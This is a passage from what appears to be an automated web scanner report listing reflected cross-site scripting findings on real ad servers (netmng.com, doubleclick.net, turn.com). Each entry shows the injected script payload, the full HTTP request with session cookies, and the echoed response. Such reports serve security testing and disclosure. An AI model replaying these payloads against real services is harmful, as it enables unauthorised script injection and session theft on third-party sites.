User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: evo5=hryjysfdf0upy%7ChmKrC4uqXwyKEq2D0zN7z3w4I9UsaebVw0C8tcmHu3W2hNa0FXsr7rQreKFYfn8aDum9MIBCzH5i6UHr3K8%2B%2FGO0iNX8jxKwnOnl%2Fdwz6Q3nevqW761%2FSPWVjeuthbVgxAfVMpl9pGOuxNbLa%2FAUUAwFQ%2BNAGUP78O2Ea6XX2UwRwaN3KyxZ4YAuk5XSS71KqSAnZx3HX6TOKSmtb8Isi8VHdeTLFj4BdvghV79DeDb0O283Bj8I27%2FJMqWhFOxbhal4JR%2FrVjEuetCnzzZ%2B9TxdqPgTjGPsXEz72rPqCDmab5%2BCFHagvG2BRygZuritvfpnObnfPDTtSqhTTzFBqkA5zV%2Bjcros7mCvT3FoNTqX6osMQGdpmzoY77qZWBbZ; evo5_ii=vcRY%2BVCpUfN0%2BPB1tFnV5yG7u0dcFwU2HUsmkxANIEaW0e99haFIbVN4RXHwO17b99k3tT4krtzpwqtfFqzt7w%3D%3D; evo5_display=dLlGabeGUgWLGMs8D976%2FClUB%2B%2Bwcf164wnglFlBvlw%3D

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:01:43 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Tue, 19 Jul 2011 18:01:43 GMT
Last-Modified: Tue, 19 Jul 2011 18:01:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=JLLF4eT1WhcY7TzYRhauNik%2BFECnwub8U63nHW2DWuRflztgED0I2C1qSGxfKQ30JhG6I9%2B82AcGCSG4fp0PY4TBZ4S3MlrjOmmteXUAUoOdN7dG7kiWhSQrDQPTbLOV; expires=Fri, 20-Jan-2012 18:01:43 GMT; path=/
Set-Cookie: evo5_display=hKn31hJ9q24SwrCsKVHtvYupVI9QLFINGjr%2BmRr8YLXwAyLdvUmC2N2XsEzoQNrOmFE38RQRoG368kINn%2FWgDA%3D%3D; expires=Sat, 25-Jun-44591 18:01:43 GMT; path=/; domain=.netmng.com
Content-Length: 1781
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271303;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394437b532"><script>alert(1)</script>1c809b7e17d;?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.21. http://a.netmng.com/hic/ [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb57"><script>alert(1)</script>d7a9c0aaf4c was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hic/?nm_width=300&nm_height=250&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737354895902192%26l%3D908365%26ad%3D96040%26s%3D917258%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394438fb57"><script>alert(1)</script>d7a9c0aaf4c HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: evo5=hryjysfdf0upy%7ChmKrC4uqXwyKEq2D0zN7z3w4I9UsaebVw0C8tcmHu3W2hNa0FXsr7rQreKFYfn8aDum9MIBCzH5i6UHr3K8%2B%2FGO0iNX8jxKwnOnl%2Fdwz6Q3nevqW761%2FSPWVjeuthbVgxAfVMpl9pGOuxNbLa%2FAUUAwFQ%2BNAGUP78O2Ea6XX2UwRwaN3KyxZ4YAuk5XSS71KqSAnZx3HX6TOKSmtb8Isi8VHdeTLFj4BdvghV79DeDb0O283Bj8I27%2FJMqWhFOxbhal4JR%2FrVjEuetCnzzZ%2B9TxdqPgTjGPsXEz72rPqCDmab5%2BCFHagvG2BRygZuritvfpnObnfPDTtSqhTTzFBqkA5zV%2Bjcros7mCvT3FoNTqX6osMQGdpmzoY77qZWBbZ; evo5_ii=vcRY%2BVCpUfN0%2BPB1tFnV5yG7u0dcFwU2HUsmkxANIEaW0e99haFIbVN4RXHwO17b99k3tT4krtzpwqtfFqzt7w%3D%3D; evo5_display=dLlGabeGUgWLGMs8D976%2FClUB%2B%2Bwcf164wnglFlBvlw%3D

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:01:43 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Tue, 19 Jul 2011 18:01:43 GMT
Last-Modified: Tue, 19 Jul 2011 18:01:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=JLLF4eT1WhcY7TzYRhauNik%2BFECnwub8U63nHW2DWuRvPrOi2h1nnLXEbLzAx%2FMbymvWgkgSDWaJ1NnSqwvsCipe9M%2B%2F6dyjEczknUspeVthiWdr3v5YG6tiKaLtu61l; expires=Fri, 20-Jan-2012 18:01:43 GMT; path=/
Set-Cookie: evo5_display=hKn31hJ9q24SwrCsKVHtvYupVI9QLFINGjr%2BmRr8YLXwAyLdvUmC2N2XsEzoQNrOmFE38RQRoG368kINn%2FWgDA%3D%3D; expires=Sat, 25-Jun-44591 18:01:43 GMT; path=/; domain=.netmng.com
Content-Length: 1781
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271303;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http:/
...[SNIP]...
k?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394438fb57"><script>alert(1)</script>d7a9c0aaf4c;?">
...[SNIP]...

3.22. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_newsreel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43e13"style%3d"x%3aexpression(alert(1))"6815619fe6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43e13"style="x:expression(alert(1))"6815619fe6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/markets_newsreel;u=;;;mc=b2pfreezone;tile=1;sz=2x94;ord=4782478247824782;&43e13"style%3d"x%3aexpression(alert(1))"6815619fe6d=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2300_NewsReel.html?baseDocId=SB10001424053111904233404576462461660747244
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 422
Date: Sat, 23 Jul 2011 04:31:24 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/h;44306;0-0;0;31680216;31596-2/94;0/0/0;u=;~okv=;u=;;;mc=b2pfreezone;tile=1;sz=2x94;&43e13"style="x:expression(alert(1))"6815619fe6d=1;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

3.23. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_newsreel

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da5f6"style%3d"x%3aexpression(alert(1))"3f1246fe48e was submitted in the u parameter. This input was echoed as da5f6"style="x:expression(alert(1))"3f1246fe48e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/markets_newsreel;u=;;;mc=b2pfreezone;tile=1;sz=2x94;ord=4782478247824782;da5f6"style%3d"x%3aexpression(alert(1))"3f1246fe48e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2300_NewsReel.html?baseDocId=SB10001424053111904233404576462461660747244
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 419
Date: Sat, 23 Jul 2011 04:31:19 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/h;44306;0-0;0;31680216;31596-2/94;0/0/0;u=;~okv=;u=;;;mc=b2pfreezone;tile=1;sz=2x94;da5f6"style="x:expression(alert(1))"3f1246fe48e;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

3.24. http://ad.doubleclick.net/adj/N2883.132636.QUADRANTONE.COM/B5629721.18 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2883.132636.QUADRANTONE.COM/B5629721.18

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a0c9'-alert(1)-'10a8566025f was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2883.132636.QUADRANTONE.COM/B5629721.18;sz=8a0c9'-alert(1)-'10a8566025f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 36606
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 13:48:38 GMT
Expires: Sat, 23 Jul 2011 13:48:38 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
ttp://ad.doubleclick.net/activity;src=3149779;stragg=1;v=1;pid=65553367;aid=242867278;ko=0;cid=42426448;rid=42444235;rv=2;rn=2872633;";
this.swfParams = 'src=3149779&rv=2&rid=42444235&=8a0c9'-alert(1)-'10a8566025f&';
this.renderingId = "42444235";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

3.25. http://ad.doubleclick.net/adj/lfs2.lifescript/conditions [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/lfs2.lifescript/conditions

Issue detail

The value of the path request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf736'%3balert(1)//b8265541d86 was submitted in the path parameter. This input was echoed as bf736';alert(1)//b8265541d86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/lfs2.lifescript/conditions;path=bf736'%3balert(1)//b8265541d86 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=1;sz=728x90;ord=101352252258050
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 286
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 21 Jul 2011 19:22:58 GMT
Expires: Thu, 21 Jul 2011 19:22:58 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4b/0/0/%2a/y;44306;0-0;0;31210306;3454-728/90;0/0/0;;~okv=;path=bf736';alert(1)//b8265541d86;~sscs=%3f"><img src="http:/
...[SNIP]...

3.26. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ostg.sourceforge/cons_none_p71_text

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61790'-alert(1)-'fcbfe393cb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ostg.sourceforge/cons_none_p71_text;pg=/projects;psrch=0;logged_in=0;tpc=hoytllc-vcloud;tile=2;sz=;ord=2861515760451365?&61790'-alert(1)-'fcbfe393cb3=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/hoytllc-vcloud/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 341
Date: Sat, 23 Jul 2011 04:42:43 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/m;44306;0-0;0;38027281;255-0/0;0/0/0;;~okv=;pg=/projects;psrch=0;logged_in=0;tpc=hoytllc-vcloud;tile=2;sz=;;61790'-alert(1)-'fcbfe393cb3=1;~sscs=%3f">
...[SNIP]...

3.27. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [pg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ostg.sourceforge/cons_none_p71_text

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc625'%3balert(1)//e12694d7dfb was submitted in the pg parameter. This input was echoed as cc625';alert(1)//e12694d7dfb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ostg.sourceforge/cons_none_p71_text;pg=cc625'%3balert(1)//e12694d7dfb HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/hoytllc-vcloud/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 278
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 04:42:39 GMT
Expires: Sat, 23 Jul 2011 04:42:39 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/m;44306;0-0;0;38027281;255-0/0;0/0/0;;~okv=;pg=cc625';alert(1)//e12694d7dfb;~sscs=%3f"><img src="http://s0.2mdn
...[SNIP]...

3.28. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ostg.sourceforge/pg_viewvc_p88_shortrec

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1062a'%3balert(1)//19c389f15b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1062a';alert(1)//19c389f15b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ostg.sourceforge/pg_viewvc_p88_shortrec;pg=viewvc;tile=1;tpc=hoytllc-vcloud;ord=7437528464769978;sz=1x1?&1062a'%3balert(1)//19c389f15b=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hoytllc-vcloud.svn.sourceforge.net/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 342
Date: Sat, 23 Jul 2011 04:42:56 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/d;44306;0-0;0;30748661;31-1/1;0/0/0;;~okv=;pg=viewvc;tile=1;tpc=hoytllc-vcloud;sz=1x1?&1062a';alert(1)//19c389f15b=1;bsg=109738;bsg=109741;;~sscs=%3f">
...[SNIP]...

3.29. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [pg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ostg.sourceforge/pg_viewvc_p88_shortrec

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe9a9'%3balert(1)//049934a0fac was submitted in the pg parameter. This input was echoed as fe9a9';alert(1)//049934a0fac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ostg.sourceforge/pg_viewvc_p88_shortrec;pg=fe9a9'%3balert(1)//049934a0fac HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hoytllc-vcloud.svn.sourceforge.net/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 301
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 04:42:53 GMT
Expires: Sat, 23 Jul 2011 04:42:53 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/k;44306;0-0;0;30748661;255-0/0;0/0/0;;~okv=;pg=fe9a9';alert(1)//049934a0fac;bsg=109738;bsg=109741;;~sscs=%3f"><
...[SNIP]...

3.30. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35290"><script>alert(1)</script>9abbec4719c was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=35290"><script>alert(1)</script>9abbec4719c&sp=y HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: uid=4146544210108361256; pf=nZySyOPeh2ug-66f3S_YJ-08eNO3kJ_g1J0ui0giN0IO9arxyxx0God0z89jjC5u7B_Md7IXVjaLRc76_SNpoZsbEDch1o94tTK7X4mzUCMC35RnwUiMoGkJYCinoxtJgfaE0IC8cyLwhG_8rfNFZKo408BxR9uazB8jKSDnLvk; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7Cundefined%7Cundefined%7C15177%7C15177%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15177; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4146544210108361256; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:00:58 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:58 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4146544210108361256&rnd=8293284759505948787&fpid=35290"><script>alert(1)</script>9abbec4719c&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.31. http://ad.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b8d"><script>alert(1)</script>02186be73ca was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=18b8d"><script>alert(1)</script>02186be73ca HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: uid=4146544210108361256; pf=nZySyOPeh2ug-66f3S_YJ-08eNO3kJ_g1J0ui0giN0IO9arxyxx0God0z89jjC5u7B_Md7IXVjaLRc76_SNpoZsbEDch1o94tTK7X4mzUCMC35RnwUiMoGkJYCinoxtJgfaE0IC8cyLwhG_8rfNFZKo408BxR9uazB8jKSDnLvk; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7Cundefined%7Cundefined%7C15177%7C15177%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15177; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4146544210108361256; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:00:58 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:57 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4146544210108361256&rnd=2626437605781778254&fpid=1&nu=n&t=&sp=18b8d"><script>alert(1)</script>02186be73ca&purl=&ctid=1"
